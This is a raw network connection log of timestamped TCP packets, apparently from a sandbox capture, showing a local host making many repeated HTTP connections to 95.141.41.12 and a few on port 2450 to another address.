Sep 28, 2023 06:03:05.028899908 CEST	50025	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:05.029277086 CEST	50026	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:05.217207909 CEST	80	50025	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:05.217349052 CEST	50025	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:05.227844000 CEST	80	50026	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:05.228171110 CEST	50026	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:05.228338957 CEST	50026	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:05.426418066 CEST	80	50026	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:05.430648088 CEST	80	50026	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:05.430732012 CEST	50026	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:05.543750048 CEST	50026	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:05.544173002 CEST	50028	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:05.732201099 CEST	80	50028	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:05.732476950 CEST	50028	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:05.732593060 CEST	50028	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:05.741950035 CEST	80	50026	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:05.742167950 CEST	50026	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:05.920322895 CEST	80	50028	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:05.924587965 CEST	80	50028	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:05.924664974 CEST	50028	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:06.028115034 CEST	50028	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:06.028527021 CEST	50029	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:06.212625027 CEST	80	50029	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:06.212737083 CEST	50029	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:06.212996960 CEST	50029	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:06.215678930 CEST	80	50028	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:06.215872049 CEST	50028	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:06.397089958 CEST	80	50029	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:06.401823044 CEST	80	50029	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:06.401899099 CEST	50029	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:06.513814926 CEST	50029	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:06.514079094 CEST	50031	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:06.697907925 CEST	80	50029	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:06.698072910 CEST	80	50031	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:06.698081970 CEST	50029	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:06.698220968 CEST	50031	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:06.698995113 CEST	50031	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:06.882733107 CEST	80	50031	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:06.887833118 CEST	80	50031	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:06.887923002 CEST	50031	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:06.996849060 CEST	50031	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:06.997301102 CEST	50033	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:07.181144953 CEST	80	50031	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:07.181382895 CEST	50031	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:07.183860064 CEST	80	50033	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:07.184062958 CEST	50033	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:07.184398890 CEST	50033	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:07.371047020 CEST	80	50033	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:07.375551939 CEST	80	50033	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:07.375674009 CEST	50033	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:07.481650114 CEST	50033	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:07.483191967 CEST	50034	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:07.668565989 CEST	80	50033	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:07.668776035 CEST	50033	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:07.673661947 CEST	80	50034	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:07.673752069 CEST	50034	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:07.674040079 CEST	50034	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:07.864697933 CEST	80	50034	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:07.869729042 CEST	80	50034	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:07.869976044 CEST	50034	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:07.981121063 CEST	50034	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:07.981439114 CEST	50035	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:08.165328026 CEST	80	50035	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:08.165591002 CEST	50035	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:08.165680885 CEST	50035	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:08.171720028 CEST	80	50034	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:08.171809912 CEST	50034	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:08.349806070 CEST	80	50035	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:08.354300976 CEST	80	50035	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:08.354563951 CEST	50035	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:08.467233896 CEST	50035	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:08.467529058 CEST	50036	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:08.651967049 CEST	80	50035	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:08.652122974 CEST	80	50036	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:08.652261019 CEST	50036	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:08.652345896 CEST	50035	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:08.652456999 CEST	50036	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:08.837749958 CEST	80	50036	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:08.842300892 CEST	80	50036	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:08.842400074 CEST	50036	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:08.950124025 CEST	50036	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:08.950397968 CEST	50037	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:09.135057926 CEST	80	50036	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:09.135241032 CEST	50036	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:09.137384892 CEST	80	50037	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:09.137490034 CEST	50037	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:09.137732983 CEST	50037	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:09.324624062 CEST	80	50037	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:09.328531981 CEST	80	50037	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:09.328856945 CEST	50037	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:09.434539080 CEST	50037	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:09.435616970 CEST	50038	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:09.622809887 CEST	80	50037	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:09.622999907 CEST	50037	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:09.635207891 CEST	80	50038	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:09.635478973 CEST	50038	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:09.635478973 CEST	50038	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:09.835449934 CEST	80	50038	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:09.840040922 CEST	80	50038	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:09.840163946 CEST	50038	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:09.949963093 CEST	50038	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:09.950902939 CEST	50039	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:10.134866953 CEST	80	50039	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:10.135023117 CEST	50039	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:10.135186911 CEST	50039	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:10.150073051 CEST	80	50038	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:10.150158882 CEST	50038	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:10.319060087 CEST	80	50039	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:10.324111938 CEST	80	50039	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:10.324203014 CEST	50039	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:10.436077118 CEST	50039	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:10.436489105 CEST	50041	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:10.620239019 CEST	80	50039	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:10.620487928 CEST	50039	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:10.636137009 CEST	80	50041	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:10.636323929 CEST	50041	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:10.636466980 CEST	50041	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:10.835969925 CEST	80	50041	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:10.838809013 CEST	80	50041	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:10.839039087 CEST	50041	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:10.950623989 CEST	50041	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:10.952102900 CEST	50042	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:11.147258043 CEST	80	50042	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:11.147330999 CEST	50042	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:11.147564888 CEST	50042	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:11.150310040 CEST	80	50041	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:11.150388956 CEST	50041	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:11.341710091 CEST	80	50042	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:11.346677065 CEST	80	50042	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:11.346735001 CEST	50042	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:11.450195074 CEST	50042	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:11.450711012 CEST	50043	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:11.645858049 CEST	80	50042	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:11.645952940 CEST	50042	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:11.654936075 CEST	80	50043	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:11.655133009 CEST	50043	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:11.655272961 CEST	50043	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:11.860061884 CEST	80	50043	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:11.864571095 CEST	80	50043	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:11.864756107 CEST	50043	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:11.968611002 CEST	50043	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:11.969178915 CEST	50045	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:12.165448904 CEST	80	50045	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:12.165581942 CEST	50045	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:12.165865898 CEST	50045	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:12.174154997 CEST	80	50043	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:12.174333096 CEST	50043	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:12.362132072 CEST	80	50045	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:12.368468046 CEST	80	50045	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:12.368643045 CEST	50045	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:12.481286049 CEST	50045	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:12.481692076 CEST	50046	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:12.677988052 CEST	80	50045	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:12.678203106 CEST	50045	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:12.687882900 CEST	80	50046	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:12.688303947 CEST	50046	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:12.688304901 CEST	50046	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:12.894687891 CEST	80	50046	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:12.901757956 CEST	80	50046	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:12.901835918 CEST	50046	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:13.013844013 CEST	50046	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:13.014343977 CEST	50047	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:13.201992989 CEST	80	50047	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:13.202110052 CEST	50047	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:13.202429056 CEST	50047	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:13.220452070 CEST	80	50046	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:13.220578909 CEST	50046	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:13.389580011 CEST	80	50047	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:13.395750046 CEST	80	50047	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:13.395900011 CEST	50047	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:13.498768091 CEST	50047	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:13.499104977 CEST	50049	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:13.686408043 CEST	80	50047	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:13.686722994 CEST	50047	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:13.696398020 CEST	80	50049	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:13.696506977 CEST	50049	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:13.696798086 CEST	50049	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:13.895288944 CEST	80	50049	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:13.898997068 CEST	80	50049	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:13.899141073 CEST	50049	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:14.013983011 CEST	50049	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:14.014403105 CEST	50050	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:14.202931881 CEST	80	50050	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:14.203048944 CEST	50050	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:14.203255892 CEST	50050	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:14.212511063 CEST	80	50049	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:14.212613106 CEST	50049	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:14.390633106 CEST	80	50050	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:14.393055916 CEST	80	50050	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:14.393302917 CEST	50050	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:14.498234034 CEST	50050	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:14.498593092 CEST	50051	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:14.686903000 CEST	80	50050	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:14.687211037 CEST	50050	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:14.697031975 CEST	80	50051	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:14.697118998 CEST	50051	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:14.697340965 CEST	50051	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:14.894578934 CEST	80	50051	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:14.897515059 CEST	80	50051	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:14.897587061 CEST	50051	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:15.013775110 CEST	50051	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:15.016098022 CEST	50053	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:15.211869955 CEST	80	50051	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:15.212079048 CEST	50051	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:15.213342905 CEST	80	50053	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:15.213522911 CEST	50053	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:15.213628054 CEST	50053	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:15.411674976 CEST	80	50053	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:15.416615009 CEST	80	50053	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:15.416776896 CEST	50053	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:15.529664993 CEST	50053	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:15.530229092 CEST	50054	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:15.727600098 CEST	80	50054	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:15.727663994 CEST	80	50053	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:15.727734089 CEST	50053	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:15.727808952 CEST	50054	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:15.727963924 CEST	50054	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:15.925539970 CEST	80	50054	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:15.930646896 CEST	80	50054	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:15.930771112 CEST	50054	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:16.044725895 CEST	50054	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:16.045186043 CEST	50055	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:16.241425991 CEST	80	50055	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:16.241648912 CEST	50055	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:16.241962910 CEST	50055	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:16.242064953 CEST	80	50054	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:16.242151976 CEST	50054	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:16.420615911 CEST	2450	49801	81.19.131.36	192.168.2.3
Sep 28, 2023 06:03:16.421967030 CEST	49801	2450	192.168.2.3	81.19.131.36
Sep 28, 2023 06:03:16.438226938 CEST	80	50055	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:16.449300051 CEST	80	50055	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:16.449537039 CEST	50055	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:16.561151981 CEST	50055	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:16.561604023 CEST	50057	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:16.632816076 CEST	2450	49801	81.19.131.36	192.168.2.3
Sep 28, 2023 06:03:16.755960941 CEST	80	50057	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:16.756131887 CEST	50057	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:16.756385088 CEST	50057	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:16.757601976 CEST	80	50055	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:16.757781982 CEST	50055	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:16.951164007 CEST	80	50057	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:16.955512047 CEST	80	50057	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:16.955702066 CEST	50057	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:17.107496977 CEST	50057	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:17.107908010 CEST	50058	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:17.302620888 CEST	80	50057	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:17.302817106 CEST	50057	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:17.307085991 CEST	80	50058	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:17.307221889 CEST	50058	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:17.307439089 CEST	50058	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:17.507088900 CEST	80	50058	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:17.517285109 CEST	80	50058	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:17.517523050 CEST	50058	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:17.624387026 CEST	50058	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:17.627355099 CEST	50059	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:17.824419975 CEST	80	50058	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:17.824579954 CEST	50058	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:17.826580048 CEST	80	50059	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:17.826790094 CEST	50059	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:17.826875925 CEST	50059	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:18.026479959 CEST	80	50059	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:18.031075001 CEST	80	50059	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:18.031265020 CEST	50059	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:18.138804913 CEST	50059	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:18.139271975 CEST	50061	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:18.327003956 CEST	80	50061	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:18.327227116 CEST	50061	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:18.329953909 CEST	50061	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:18.339668989 CEST	80	50059	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:18.339766026 CEST	50059	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:18.517472982 CEST	80	50061	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:18.521771908 CEST	80	50061	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:18.521928072 CEST	50061	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:18.639571905 CEST	50061	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:18.639899015 CEST	50062	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:18.827455044 CEST	80	50061	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:18.827518940 CEST	80	50062	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:18.827658892 CEST	50061	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:18.827739000 CEST	50062	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:18.827861071 CEST	50062	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:19.015847921 CEST	80	50062	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:19.019984961 CEST	80	50062	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:19.020169020 CEST	50062	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:19.123037100 CEST	50062	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:19.123384953 CEST	50063	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:19.310236931 CEST	80	50063	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:19.310348034 CEST	50063	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:19.310518980 CEST	80	50062	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:19.310545921 CEST	50063	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:19.310698986 CEST	50062	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:19.497915030 CEST	80	50063	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:19.502789021 CEST	80	50063	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:19.502893925 CEST	50063	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:19.607567072 CEST	50063	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:19.608051062 CEST	50065	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:19.794891119 CEST	80	50063	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:19.795268059 CEST	50063	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:19.804068089 CEST	80	50065	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:19.804447889 CEST	50065	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:19.804449081 CEST	50065	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:20.000922918 CEST	80	50065	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:20.006391048 CEST	80	50065	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:20.006711960 CEST	50065	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:20.123362064 CEST	50065	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:20.123737097 CEST	50066	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:20.319484949 CEST	80	50065	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:20.319683075 CEST	50065	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:20.320707083 CEST	80	50066	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:20.320924044 CEST	50066	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:20.321014881 CEST	50066	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:20.518028975 CEST	80	50066	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:20.523762941 CEST	80	50066	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:20.524034023 CEST	50066	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:20.638644934 CEST	50066	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:20.639214993 CEST	50067	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:20.829534054 CEST	80	50067	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:20.829628944 CEST	50067	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:20.829813004 CEST	50067	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:20.836014986 CEST	80	50066	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:20.836294889 CEST	50066	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:21.020168066 CEST	80	50067	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:21.025604963 CEST	80	50067	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:21.025855064 CEST	50067	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:21.138797045 CEST	50067	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:21.139184952 CEST	50069	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:21.329541922 CEST	80	50067	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:21.329703093 CEST	50067	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:21.329927921 CEST	80	50069	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:21.330003023 CEST	50069	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:21.330163956 CEST	50069	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:21.520957947 CEST	80	50069	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:21.525522947 CEST	80	50069	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:21.525613070 CEST	50069	80	192.168.2.3	95.141.41.12
